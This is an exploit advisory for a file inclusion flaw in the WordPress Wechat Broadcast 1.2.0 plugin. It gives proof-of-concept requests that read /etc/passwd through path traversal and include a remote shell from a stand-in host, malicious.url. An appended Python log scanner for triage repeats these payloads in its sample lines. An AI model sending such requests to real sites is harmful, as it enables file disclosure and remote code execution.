WordPress Wechat Broadcast 1.2.0 Local File Inclusion

  • WordPress Wechat Broadcast plugin version 1.2.0 suffers from a local file inclusion vulnerability.
    MD5 | 96c6e22ef7a8508c4c0907ada9779757

    # Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion  
    # Author: Manuel Garcia Cardenas  
    # Date: 2018-09-19  
    # Software link: https://es.wordpress.org/plugins/wechat-broadcast/  
    # CVE: N/A  
    # Description  
    # This bug was found in the file: /wechat-broadcast/wechat/Image.php  
    # echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');  
    # The parameter "url" is not sanitized, allowing the inclusion of local or remote files.  
    # To exploit the vulnerability, it is only necessary to use version 1.0 of the HTTP protocol  
    # to interact with the application.  
    # PoC  
    # The following URL has been confirmed to be vulnerable to local and remote file inclusion.  
    GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd  
    # Remote File Inclusion POC:  
    GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt  
    

    Source: packetstormsecurity.com
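
For triage on a site that ran this plugin, the following added example (not part of the original advisory or the plugin's code) scans web server access logs for requests to the `Image.php` endpoint named above and classifies the `url` value, undoing nested percent-encoding first. It assumes Combined Log Format; `ALLOWED_HOSTS` is a hypothetical placeholder for whatever image hosts the site legitimately uses, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint named in the advisory; the prefix before it varies per install.
ENDPOINT = "/wp-content/plugins/wechat-broadcast/wechat/Image.php"
# Assumption (hypothetical): the only hosts this site legitimately fetches images from.
ALLOWED_HOSTS = {"images.example.com"}
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
SUSPICIOUS = {"traversal", "local-path", "untrusted-remote", "other-scheme", "malformed"}

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding such as %252e%252e -> '..'."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return None for unrelated requests, else a verdict on the url= value."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    try:
        target = urlsplit(m.group(1))
        if not target.path.endswith(ENDPOINT):
            return None
        values = parse_qs(target.query, keep_blank_values=True).get("url")
        if not values:
            return "no-url-param"
        value = fully_decode(values[0]).replace("\\", "/")
        parts = urlsplit(value)
        host = (parts.hostname or "").lower()
    except ValueError:
        return "malformed"
    if parts.scheme in ("http", "https"):
        return "allowed-remote" if host in ALLOWED_HOSTS else "untrusted-remote"
    if parts.scheme:
        return "other-scheme"
    return "traversal" if ".." in value.split("/") else "local-path"

SAMPLE_LOG = [  # constructed log lines using documentation address ranges
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../etc/passwd HTTP/1.0" 200 1843',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.0" 200 1843',
    '198.51.100.9 - - [01/Jan/2024:10:00:03 +0000] "GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt HTTP/1.0" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:00:04 +0000] "GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=https://images.example.com/a.png HTTP/1.1" 200 20480',
]

def scan(lines):
    """Return (line_number, verdict) for every request worth triaging."""
    return [(n, v) for n, l in enumerate(lines, 1) if (v := classify(l)) in SUSPICIOUS]
```

A 200 response with a non-trivial body size on a `traversal` or `local-path` hit is the signal to prioritise, since the script echoes whatever it managed to read.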
